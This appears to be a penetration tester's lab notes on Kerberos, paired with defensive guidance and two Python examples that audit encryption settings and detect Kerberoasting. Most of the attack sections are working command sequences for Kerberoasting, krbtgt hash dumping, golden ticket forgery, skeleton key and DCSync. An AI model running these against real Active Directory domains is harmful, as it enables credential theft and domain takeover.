# Kerberos

## General

* 3 heads of Kerberos (the three parties in every exchange):
  * Client > KDC (trusted third party, runs on the DC) > Server

## Ticket Flow

| **Ticket Flow**                   | Example                          |
| --------------------------------- | -------------------------------- |
| Request TGT >                     | Apply for driver's license >     |
| < TGT + SessionKey                | < Granted with hologram          |
| TGT + Request to TGS >            | Request to go to ABC Store >     |
| < ServiceTicket                   | < Approved w/ ABC hash/ticket    |
| Auth to Service w/ServiceTicket > | Going to ABC Store >             |

## 3 Long-Term Keys

1. Client (me)
2. Target/Service key
3. KDC (from krbtgt acct)

## Group Policy for TGT Encryption

* Computer Configuration > Policies > Windows Settings > Security Settings
* \> Local Policies > Security Options > Network security: Configure encryption types allowed for Kerberos
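The GPO above sets the domain-wide allow-list, but the per-account `msDS-SupportedEncryptionTypes` attribute decides which types the KDC will use for a given service account's tickets. The following is an added example (not from the original page) that decodes that bitmask over a constructed LDAP-style export and reports which SPN-bearing accounts would still be issued RC4 service tickets. The bit values are the real AD definitions; the account names, SPNs and the `domain_default_rc4` parameter are assumptions for the example.

```python
"""Audit msDS-SupportedEncryptionTypes on SPN-bearing accounts (added example).

The attribute name and the bit values below are the real AD definitions.
The account records are constructed for this example, shaped like an LDAP export.
"""
DES_CBC_CRC = 0x01
DES_CBC_MD5 = 0x02
RC4_HMAC = 0x04
AES128_CTS_HMAC_SHA1 = 0x08
AES256_CTS_HMAC_SHA1 = 0x10

ETYPE_NAMES = {
    DES_CBC_CRC: "DES-CBC-CRC",
    DES_CBC_MD5: "DES-CBC-MD5",
    RC4_HMAC: "RC4-HMAC",
    AES128_CTS_HMAC_SHA1: "AES128",
    AES256_CTS_HMAC_SHA1: "AES256",
}

# Constructed sample export: name -> attributes (not real accounts)
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "svcsqlserver", "servicePrincipalName": ["MSSQLSvc/dc.domain.local:1433"],
     "msDS-SupportedEncryptionTypes": None, "memberOf": ["Domain Admins"]},
    {"sAMAccountName": "agpmsvc", "servicePrincipalName": ["AGPMServer/agpm.domain.local"],
     "msDS-SupportedEncryptionTypes": RC4_HMAC | AES128_CTS_HMAC_SHA1 | AES256_CTS_HMAC_SHA1, "memberOf": []},
    {"sAMAccountName": "fimsvc", "servicePrincipalName": ["FIMService/fim.domain.local"],
     "msDS-SupportedEncryptionTypes": AES128_CTS_HMAC_SHA1 | AES256_CTS_HMAC_SHA1, "memberOf": []},
    {"sAMAccountName": "bob", "servicePrincipalName": [],
     "msDS-SupportedEncryptionTypes": None, "memberOf": []},
]


def decode_etypes(value):
    """Return the names of the encryption types enabled in a bitmask ([] if unset)."""
    if not value:
        return []
    return [name for bit, name in ETYPE_NAMES.items() if value & bit]


def audit_account(acct, domain_default_rc4=True):
    """Return a list of findings for one account; empty list means nothing to report."""
    findings = []
    if not acct.get("servicePrincipalName"):
        return findings  # no SPN: no service ticket can be requested for it
    etypes = acct.get("msDS-SupportedEncryptionTypes")
    if not etypes:
        # Unset: the KDC falls back to the domain default, which for user
        # accounts has historically been RC4-HMAC (assumption controlled by the flag).
        if domain_default_rc4:
            findings.append("msDS-SupportedEncryptionTypes unset; tickets default to RC4-HMAC")
    else:
        if etypes & RC4_HMAC:
            findings.append("RC4-HMAC enabled (service tickets crackable offline, hashcat -m 13100)")
        if etypes & (DES_CBC_CRC | DES_CBC_MD5):
            findings.append("DES enabled")
        if not etypes & (AES128_CTS_HMAC_SHA1 | AES256_CTS_HMAC_SHA1):
            findings.append("no AES type enabled")
    if "Domain Admins" in acct.get("memberOf", []):
        findings.append("service account is a member of Domain Admins")
    return findings


def audit(accounts, domain_default_rc4=True):
    """Map sAMAccountName -> findings for every account in the export."""
    return {a["sAMAccountName"]: audit_account(a, domain_default_rc4) for a in accounts}


if __name__ == "__main__":
    for name, findings in audit(SAMPLE_ACCOUNTS).items():
        print(name, findings or "ok")
```

Accounts that come back clean here still need the GPO above to actually block RC4, since the attribute only expresses what the account supports, not what the KDC is permitted to issue.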

## Attack Flow

1. Find AD Accts with SPN (map between service and svc-acct)
2. Request RC4 service tickets from DC
3. Extract Service Tickets to file
4. Offline Brute Force

## Kerberoasting Targets

1. MSSQL
2. AGPMServer (for GPO)
3. FIMService (Forefront Identity)
4. STS (Security Token Service VMWare)

## Defenses

* Disable RC4 with GPO
* Use AES instead
* Managed Service Accounts (gMSA/MSA: long, automatically rotated passwords, nothing to crack)
* Protected Users group: password-derived Kerberos keys are not cached in LSASS memory
* PAC validation
* Credential Guard: NT hashes and Kerberos keys are isolated from LSASS and cannot be dumped
* Service accounts like "sqlsvc" should not be Domain Admins
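Steps 2 and 3 of the attack flow above leave a trace on the DC: every service ticket request is logged as Security event 4769 with the encryption type in `TicketEncryptionType` (0x17 is RC4-HMAC, 0x11/0x12 are AES128/AES256). The following is an added example (not from the original page) that runs a Kerberoasting detection over constructed 4769 records: it flags RC4 tickets for non-machine service accounts and alerts when one requesting user collects tickets for several distinct services inside a short window. Field names follow the 4769 schema; the sample values, the window and the threshold are assumptions.

```python
"""Kerberoasting detection over Security event 4769 records (added example).

Field names (TargetUserName, ServiceName, TicketEncryptionType, IpAddress, Status)
follow the Windows 4769 event schema; the events below are constructed, not real logs.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"              # TicketEncryptionType for RC4-HMAC
AES_TYPES = {"0x11", "0x12"}   # AES128 / AES256 CTS-HMAC-SHA1-96

# Constructed sample: bob requests four RC4 tickets in a few seconds (roasting),
# alice gets a normal AES ticket, DC01$ requests a machine-account ticket,
# carol requests one RC4 ticket (normal use of a legacy service), bob also has a failure.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:01", "TargetUserName": "bob@MYDOM", "ServiceName": "svcsqlserver",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.50", "Status": "0x0"},
    {"time": "2024-05-01T10:00:02", "TargetUserName": "bob@MYDOM", "ServiceName": "agpmsvc",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.50", "Status": "0x0"},
    {"time": "2024-05-01T10:00:03", "TargetUserName": "bob@MYDOM", "ServiceName": "fimsvc",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.50", "Status": "0x0"},
    {"time": "2024-05-01T10:00:05", "TargetUserName": "bob@MYDOM", "ServiceName": "stssvc",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.50", "Status": "0x0"},
    {"time": "2024-05-01T10:00:06", "TargetUserName": "bob@MYDOM", "ServiceName": "oldsvc",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.50", "Status": "0x7"},
    {"time": "2024-05-01T10:01:00", "TargetUserName": "alice@MYDOM", "ServiceName": "svcsqlserver",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.60", "Status": "0x0"},
    {"time": "2024-05-01T10:02:00", "TargetUserName": "DC01$@MYDOM", "ServiceName": "WS01$",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.5", "Status": "0x0"},
    {"time": "2024-05-01T10:30:00", "TargetUserName": "carol@MYDOM", "ServiceName": "svcsqlserver",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.70", "Status": "0x0"},
]


def parse_time(value):
    return datetime.fromisoformat(value)


def is_suspicious_request(ev):
    """Successfully issued RC4 ticket for a user-account service (not a machine, not krbtgt)."""
    if ev["Status"] != "0x0":
        return False
    svc = ev["ServiceName"]
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False
    return ev["TicketEncryptionType"] == RC4_HMAC


def detect_kerberoast(events, window_seconds=300, min_services=3):
    """Return (suspicious_events, alerts).

    alerts maps a requesting user to the sorted set of distinct services for which
    it obtained RC4 tickets within any window of `window_seconds`.
    """
    suspicious = [ev for ev in events if is_suspicious_request(ev)]
    by_user = defaultdict(list)
    for ev in suspicious:
        by_user[ev["TargetUserName"]].append(ev)

    alerts = {}
    window = timedelta(seconds=window_seconds)
    for user, evs in by_user.items():
        evs.sort(key=lambda e: parse_time(e["time"]))
        # Sliding window anchored at each event: distinct services requested after it
        for i, start in enumerate(evs):
            t0 = parse_time(start["time"])
            services = {e["ServiceName"] for e in evs[i:] if parse_time(e["time"]) - t0 <= window}
            if len(services) >= min_services:
                alerts[user] = sorted(services)
                break
    return suspicious, alerts


if __name__ == "__main__":
    hits, alerts = detect_kerberoast(SAMPLE_EVENTS)
    print(f"{len(hits)} RC4 service-ticket requests, alerts: {alerts}")
```

A single RC4 request (carol) is expected noise in a domain that still has legacy services, which is why the alert keys on many distinct services per user in a short window; once RC4 is disabled with the GPO above, any 0x17 ticket becomes an alert on its own.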

## Kerberoasting

```
Connect to pc:
PsExec64.exe -accepteula -u bob \\$IP cmd.exe
pw-prompt: xxxx
whoami   ..bob
ipconfig ..$IP

Pull SPN's
cd \tools\ke*
> cscript.exe GetUserSPNs.vbs   ...or:
> GetUserSPNs.py -request domain\bob -dc-ip $IP > spns.output
Found 'svcsqlserver' w/RC4 (bad encryption)

Request Ticket for svcsqlserver:
C:\Tools\Kerb\powershell.exe -command "Add-Type -AssemblyName System.IdentityModel; New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'svcsqlserver/dc.domain.local:1433'"

Optional: Grabs tickets with Mimikatz and export to a list
cd ../mim*/x64/
mimikatz.exe
kerberos::list /export
exit

Crack the Kerb:
cd C:\Tools\Kerberoast\
python tgsrepcrack.py dictionary.txt file.kirbi
hashcat -m 13100 -a 0 spns.output /usr/local/..examp.dict

Connect:
cd c:\Tools\Sysinternals\
PsExec64.exe -accepteula -u mydom/svcsqlserver \\$IP cmd.exe
wmiexec.py mydom/svcsqlserver@10.10.10.5 whoami
pw-prompt: crackedpw
hostname .. DC
net user svcsqlserver /domain   ..part of Domain Admins, yikes!
win !!
```

* Other Method:
  * **Powerview** > Invoke-Kerberoast

## Golden Ticket

* Impacket:
  * secretsdump.py
  * wmiexec.py
  * lookupsid.py
  * ticketer.py

### Get the nthash

```
> secretsdump.py mydom/svcsqlserver@$IP -just-dc-user krbtgt

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:abcxyz123...:thenthashxyz1111:::
                          |
                        nthash
```

### Get the FQDN

```
> wmiexec.py mydom/svcsqlserver@$IP ipconfig /all

Windows IP Configuration
   Host Name . . . . . . . . . . . . : DC01
   Primary Dns Suffix  . . . . . . . : mydom
```

### Get the Domain SID

```
> lookupsid.py mydom/svcsqlserver@$IP

Password:
[*] Brute forcing SIDs at $IP
[*] StringBinding ncacn_np:$IP[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-111122222-3333334444-5555566666
```

### Create a golden ticket!

```
> ticketer.py -domain mydom -domain-sid S-1-5-21-111122222-3333334444-5555566666 -nthash thenthashxyz1111 Administrator

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for mydom/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncAsRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncASRepPart
[*] Saving ticket in Administrator.ccache
```

### Abuse

* The golden ticket - DO NOT EXECUTE !!!
* After exporting the **Administrator.ccache** ticket file..
* You can use any tool from the impacket suite like wmiexec or psexec with **-k -no-pass**

```
> export KRB5CCNAME=Administrator.ccache
> wmiexec.py mydom/svcsqlserver@$IP ipconfig /all -k -no-pass
```

## Mimikatz

* Create a Golden Ticket with Mimikatz

```
mimikatz > kerberos::golden /krbtgt:e19xyz... /admin:root
/domain:mydom /sid:S-1-5-21.. /ticket:golden.ticket.bin
Creates "golden.ticket.bin"

pass-the-ticket (ptt)
mimikatz > kerberos::ptt golden.ticket.bin
```

## Skeleton Key (mimikatz)

* Sets up a special key for login as **pw: mimikatz**
* Patches the LSA Process in Memory
* Requires Admin rights and Debug Privs
* Reboot to 'clear' the setup

```
mimikatz# privilege::debug
mimikatz# misc::skeleton
Done!
```

## DCSync (mimikatz)

* Copies the "ntds.dit"
* REF: [NTDS](/07-win-privesc/ntds.md)

```
m> lsadump::dcsync /user:administrator
```

## DCShadow

* Similar to DCSync
* Register myself as a DC
* Changes are pushed through replication, so they leave almost no logging

## Mimikatz GT Lab

```
-----------------
Start
cd \Tools\SysInternalsSuite\
PsExec64.exe -accepteula -u mydomain\svcsqlserver \\$IP cmd.exe
c:\Windows\System32  ..now on $IP!!
whoami /user  ..get the sid

-----------------
Imposter:
cd \tools\m*\x64
> mimikatz.exe
m> lsadump::dcsync /user:fakedc
.. i'm a dc named 'fakedc'
.. Creds: we got the ntlm hash

-----------------
Ticket:
m> kerberos::golden /rc4:xyzhash /user:administrator /domain:mydomain /sid:xyzsid
Created: "ticket.kirbi"

-----------------
Pass-the-ticket
\\10.10.10.10\c$ ..copy the ticket
cd \tools\m*\x64
> mimikatz.exe
kerberos::ptt c:\Users\me\Desktop\ticket.kirbi
exit
klist  ..shows the tickets

-----------------
Exploit:
From 10.10.10.10
PsExec64.exe -accepteula \\dc01 cmd.exe   ..will use the ticket for auth!
```
